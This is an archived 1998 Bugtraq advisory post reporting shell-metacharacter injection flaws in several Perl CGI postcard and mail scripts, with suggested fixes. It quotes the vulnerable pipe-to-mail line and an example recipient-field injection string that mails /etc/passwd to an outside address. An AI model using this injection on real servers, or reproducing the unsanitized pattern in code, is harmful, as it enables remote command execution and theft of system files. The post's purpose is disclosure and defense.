Bugtraq mailing list archives
Several new CGI vulnerabilities
From: xnec () WINTERMUTE LINUX TC (xnec)
Date: Mon, 9 Nov 1998 18:26:05 -0600
INFO: After looking over the perl-CGI scripts on www.cgi-resources.com, I've discovered vulnerabilities in the following: 1. HAMcards Postcard script v1.0 Beta 2 (www.hamnetcenter.com) 2. Hot Postal Services v?? (www.hotarea.com) note: the only metacharacter stripping this script does is rejecting any |'s 3. RC Bowen's Postcards v?? (www.rcbowen.com) 4. LakeWeb's File Mail and Mail List (expanded File Mail) v?? (www.lakeweb.com) EXPLOIT: Each of these are exploitable by inputing metacharacters into the recipient's email address. Each script calls something similar to: open( MAIL, "|$mailprog $email" ) # this particular line is from the LakeWeb scripts The exploit strings are simple, something like &mail evil () foobar com < /etc/passwd&@host.com will work for each script (the @host.com is necessary because some hosts check for "@" and ".") when placed in the Recipient Email field. As a result, any command can be executed remotely without a local account with the uid of the webserver (usually "nobody" or similar, but you never know). FIX: Either fork your sendmail process, strip out metacharacters (or only allow certian characters), use open (MAIL , "|$sendmail -t") or rm -rf ./cgi-bin. -xnec ###################################################### # xnec () wintermute linux tc - xnec on DALnet and EFnet# ######################################################
Current thread:
- Several new CGI vulnerabilities xnec (Nov 09)
- Vulnerabilities with Swish Job de Haas (Nov 09)
- Re: Several new CGI vulnerabilities Karl Hanmore (Nov 10)
- Re: Several new CGI vulnerabilities Gus (Nov 10)
- Buffer overflow in Xprt Paolo Molaro (Nov 09)
- Re: Several new CGI vulnerabilities Lincoln Stein (Nov 10)
- Re: Sendmail, lynx, Netscape, sshd, Linux kernel (twice) Andi Kleen (Nov 10)
- Re: Sendmail, lynx, Netscape, sshd, Linux kernel (twice) David S. Miller (Nov 11)
- Vulnerabilities with Swish Jochen Thomas Bauer (Nov 10)
- <Possible follow-ups>
- Re: Several new CGI vulnerabilities Lincoln Stein (Nov 12)